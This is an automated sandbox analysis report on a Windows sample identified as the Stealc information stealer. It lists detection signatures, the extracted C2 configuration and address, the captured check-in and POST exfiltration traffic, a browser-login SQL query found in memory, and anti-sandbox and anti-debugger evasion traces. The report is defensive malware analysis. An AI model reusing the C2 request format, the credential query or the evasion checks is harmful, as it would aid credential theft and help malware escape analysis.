Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520803
MD5:725d70229eb4ef1cb992cafa8a031527
SHA1:69af2b2f4a85e3ce78f5b9a9484bb7a3f13ca5ff
SHA256:edc9cb8db3fafd7737aeda3122a8a4b967cf4e79887ef38910dcfd6b2e99b635
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 725D70229EB4EF1CB992CAFA8A031527)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2044296444.0000000005280000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5064JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5064JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.8a0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T23:14:03.397773+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.8a0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_008AC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_008A9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_008A7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_008A9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_008B8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008B38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008B4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_008ADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_008AE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_008AED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008B4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AF68A FindFirstFileA,0_2_008AF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_008B3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008AF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008A16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008ADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_008ABE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 38 33 41 46 34 42 44 33 45 38 32 30 37 38 35 38 38 37 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 2d 2d 0d 0a Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="hwid"6183AF4BD3E82078588720------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="build"save------CAEHDBAAECBFHJKFCFBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_008A4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 38 33 41 46 34 42 44 33 45 38 32 30 37 38 35 38 38 37 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 2d 2d 0d 0a Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="hwid"6183AF4BD3E82078588720------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="build"save------CAEHDBAAECBFHJKFCFBF--
                Source: file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6Y3
                Source: file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpOF
                Source: file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37DW

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF0_2_00C741DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D311CF0_2_00D311CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF11D30_2_00BF11D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6F1600_2_00C6F160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B482970_2_00B48297
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6BA4D0_2_00C6BA4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C58B200_2_00C58B20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF5CAF0_2_00CF5CAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6346D0_2_00C6346D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C79EC30_2_00C79EC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C726CC0_2_00C726CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C69E830_2_00C69E83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D07E510_2_00D07E51
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6D61F0_2_00C6D61F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7AF400_2_00C7AF40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C77F640_2_00C77F64
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 008A45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: mpdgfduh ZLIB complexity 0.9948087686567164
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_008B8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_008B3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\U64Q21ZR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1871872 > 1048576
                Source: file.exeStatic PE information: Raw size of mpdgfduh is bigger than: 0x100000 < 0x1a2c00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.8a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mpdgfduh:EW;rbtrtnga:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mpdgfduh:EW;rbtrtnga:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008B9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cebea should be: 0x1d6c68
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: mpdgfduh
                Source: file.exeStatic PE information: section name: rbtrtnga
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D988D1 push ebx; mov dword ptr [esp], eax0_2_00D98937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D490C8 push esi; mov dword ptr [esp], eax0_2_00D490D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1389C push 24C9C08Ah; mov dword ptr [esp], edx0_2_00D138A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF50A9 push 112FC669h; mov dword ptr [esp], edi0_2_00CF50D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA204F push edi; mov dword ptr [esp], esp0_2_00CA20F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6407D push 6E293919h; mov dword ptr [esp], esp0_2_00D640EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0407E push 1502BB9Dh; mov dword ptr [esp], ecx0_2_00D03EFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0407E push 4BE90CEFh; mov dword ptr [esp], eax0_2_00D04100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BB035 push ecx; ret 0_2_008BB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDF034 push edi; mov dword ptr [esp], 20C32B69h0_2_00CDF04B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ecx; mov dword ptr [esp], 3DBDB44Ch0_2_00C741FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 5DCFC69Fh; mov dword ptr [esp], esi0_2_00C7429D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push edx; mov dword ptr [esp], 4C0A0D33h0_2_00C742E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 0FC4316Ah; mov dword ptr [esp], esi0_2_00C74355
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 73695A81h; mov dword ptr [esp], ecx0_2_00C74418
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ebp; mov dword ptr [esp], ebx0_2_00C744DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push edx; mov dword ptr [esp], ecx0_2_00C74555
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 13E53EF0h; mov dword ptr [esp], ecx0_2_00C74600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push esi; mov dword ptr [esp], 4E2B8EFAh0_2_00C7460E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ecx; mov dword ptr [esp], edi0_2_00C74627
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 43EEA6F9h; mov dword ptr [esp], ecx0_2_00C74679
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 56AB94FBh; mov dword ptr [esp], esi0_2_00C74733
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push edi; mov dword ptr [esp], 739F3788h0_2_00C74749
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 1F8C2E76h; mov dword ptr [esp], esi0_2_00C747A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ecx; mov dword ptr [esp], 68A69B82h0_2_00C74802
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 5A2666C4h; mov dword ptr [esp], ecx0_2_00C7483A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push esi; mov dword ptr [esp], edx0_2_00C74863
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push eax; mov dword ptr [esp], 5A94B987h0_2_00C74877
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ebp; mov dword ptr [esp], ecx0_2_00C7490C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ebp; mov dword ptr [esp], ecx0_2_00C7491E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push esi; mov dword ptr [esp], ecx0_2_00C7496A
                Source: file.exeStatic PE information: section name: mpdgfduh entropy: 7.9541059476777995

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008B9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13646
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F079 second address: C7F09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FB97CFE9222h 0x0000000f je 00007FB97CFE9216h 0x00000015 je 00007FB97CFE9216h 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007FB97CFE9216h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F09E second address: C7F0AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FB97CFF0156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F328 second address: C7F338 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB97CFE9216h 0x00000008 js 00007FB97CFE9216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F64E second address: C7F66B instructions: 0x00000000 rdtsc 0x00000002 je 00007FB97CFF015Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB97CFF015Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F66B second address: C7F66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F66F second address: C7F693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FB97CFF0156h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F693 second address: C7F69D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F829 second address: C7F835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FB97CFF0156h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F835 second address: C7F84C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB97CFE9216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F84C second address: C7F850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
